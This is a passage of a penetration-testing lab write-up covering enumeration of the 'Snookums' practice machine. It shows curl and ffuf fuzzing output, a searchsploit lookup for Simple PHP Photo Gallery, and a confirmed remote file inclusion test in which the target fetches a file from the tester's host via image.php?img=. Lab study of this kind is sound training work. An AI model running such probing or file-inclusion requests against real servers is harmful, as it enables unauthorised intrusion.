Web
Nmap discovered a Web server on the target port 80
The running service is Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/snookums]
└─$ curl -I -X OPTIONS http://$IP/
HTTP/1.1 200 OK
Date: Sun, 23 Mar 2025 19:59:33 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
X-Powered-By: PHP/5.4.16
Content-Length: 2730
Content-Type: text/html; charset=UTF-8
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/snookums]
└─$ curl -I http://$IP/
HTTP/1.1 200 OK
Date: Sun, 23 Mar 2025 19:59:37 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
X-Powered-By: PHP/5.4.16
Content-Type: text/html; charset=UTF-8/Practice/Snookums/2-Enumeration/attachments/{EC9D776F-D73D-40F6-8CED-8614F2759B2C}.png)
Webroot
While it appears to be a personal blog built in PHP, featuring photos, there is a string at the bottom suggesting that this actually might be an pre-configured application
Fuzzing
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/snookums]
└─$ ffuf -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt -u http://$IP/FUZZ -ic -e .php
________________________________________________
:: Method : GET
:: URL : http://192.168.132.58/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt
:: Extensions : .php
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
.htpasswd [Status: 403, Size: 211, Words: 15, Lines: 9, Duration: 2414ms]
.htpasswd.php [Status: 403, Size: 215, Words: 15, Lines: 9, Duration: 2433ms]
.htaccess.php [Status: 403, Size: 215, Words: 15, Lines: 9, Duration: 2434ms]
.htaccess [Status: 403, Size: 211, Words: 15, Lines: 9, Duration: 4378ms]
cgi-bin/ [Status: 403, Size: 210, Words: 15, Lines: 9, Duration: 20ms]
css [Status: 301, Size: 234, Words: 14, Lines: 8, Duration: 20ms]
db.php [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 24ms]
functions.php [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 20ms]
image.php [Status: 200, Size: 1508, Words: 87, Lines: 71, Duration: 23ms]
images [Status: 301, Size: 237, Words: 14, Lines: 8, Duration: 20ms]
index.php [Status: 200, Size: 2730, Words: 214, Lines: 91, Duration: 25ms]
js [Status: 301, Size: 233, Words: 14, Lines: 8, Duration: 19ms]
photos [Status: 301, Size: 237, Words: 14, Lines: 8, Duration: 20ms]
:: Progress: [40956/40956] :: Job [1/1] :: 2061 req/sec :: Duration: [0:00:24] :: Errors: 0 ::
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/snookums]
└─$ ffuf -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -recursion -u http://$IP/FUZZ -ic
________________________________________________
:: Method : GET
:: URL : http://192.168.132.58/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
[Status: 200, Size: 2730, Words: 214, Lines: 91, Duration: 21ms]
images [Status: 301, Size: 237, Words: 14, Lines: 8, Duration: 21ms]
[INFO] Adding a new job to the queue: http://192.168.132.58/images/FUZZ
photos [Status: 301, Size: 237, Words: 14, Lines: 8, Duration: 21ms]
[INFO] Adding a new job to the queue: http://192.168.132.58/photos/FUZZ
css [Status: 301, Size: 234, Words: 14, Lines: 8, Duration: 17ms]
[INFO] Adding a new job to the queue: http://192.168.132.58/css/FUZZ
js [Status: 301, Size: 233, Words: 14, Lines: 8, Duration: 20ms]
[INFO] Adding a new job to the queue: http://192.168.132.58/js/FUZZ
[Status: 200, Size: 2730, Words: 214, Lines: 91, Duration: 20ms]
[INFO] Starting queued job on target: http://192.168.132.58/images/FUZZ
[Status: 200, Size: 3023, Words: 298, Lines: 26, Duration: 19ms]
examples [Status: 301, Size: 246, Words: 14, Lines: 8, Duration: 18ms]
[INFO] Adding a new job to the queue: http://192.168.132.58/images/examples/FUZZ
[Status: 200, Size: 3023, Words: 298, Lines: 26, Duration: 20ms]
[INFO] Starting queued job on target: http://192.168.132.58/photos/FUZZ
[Status: 200, Size: 675, Words: 53, Lines: 15, Duration: 20ms]
[Status: 200, Size: 675, Words: 53, Lines: 15, Duration: 19ms]
[INFO] Starting queued job on target: http://192.168.132.58/css/FUZZ
[Status: 200, Size: 1093, Words: 95, Lines: 17, Duration: 19ms]
[Status: 200, Size: 1093, Words: 95, Lines: 17, Duration: 19ms]
[INFO] Starting queued job on target: http://192.168.132.58/js/FUZZ
[Status: 200, Size: 1576, Words: 120, Lines: 19, Duration: 19ms]
[Status: 200, Size: 1576, Words: 120, Lines: 19, Duration: 28ms]
[INFO] Starting queued job on target: http://192.168.132.58/images/examples/FUZZ
[Status: 200, Size: 3268, Words: 312, Lines: 27, Duration: 24ms]
[Status: 200, Size: 3268, Words: 312, Lines: 27, Duration: 21ms]
:: Progress: [220546/220546] :: Job [6/6] :: 1923 req/sec :: Duration: [0:02:05] :: Errors: 0 ::
N/A
Vulnerabilities
/Practice/Snookums/2-Enumeration/attachments/{BCBDA499-83B7-4766-B211-6F042E05BAA1}.png)
I found out that the project is literally called Simple PHP Photo Gallery(simplephphgal)
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/snookums]
└─$ searchsploit simplephpgal
----------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------- ---------------------------------
SimplePHPGal 0.7 - Remote File Inclusion | php/webapps/48424.txt
----------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No ResultsLooking it up locally for vulnerabilities reveals a RFI vulnerability, but this targets the version 0.7, whereas the target instance is 0.8
Testing
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/snookums]
└─$ curl -I http://$IP/image.php?img=http://$tun0/RFI
HTTP/1.1 200 OK
Date: Sun, 23 Mar 2025 20:39:18 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
X-Powered-By: PHP/5.4.16
Content-Type: text/html; charset=UTF-8/Practice/Snookums/2-Enumeration/attachments/{02816616-6E58-4216-90A7-8B2E6B479EDB}.png)
Confirmed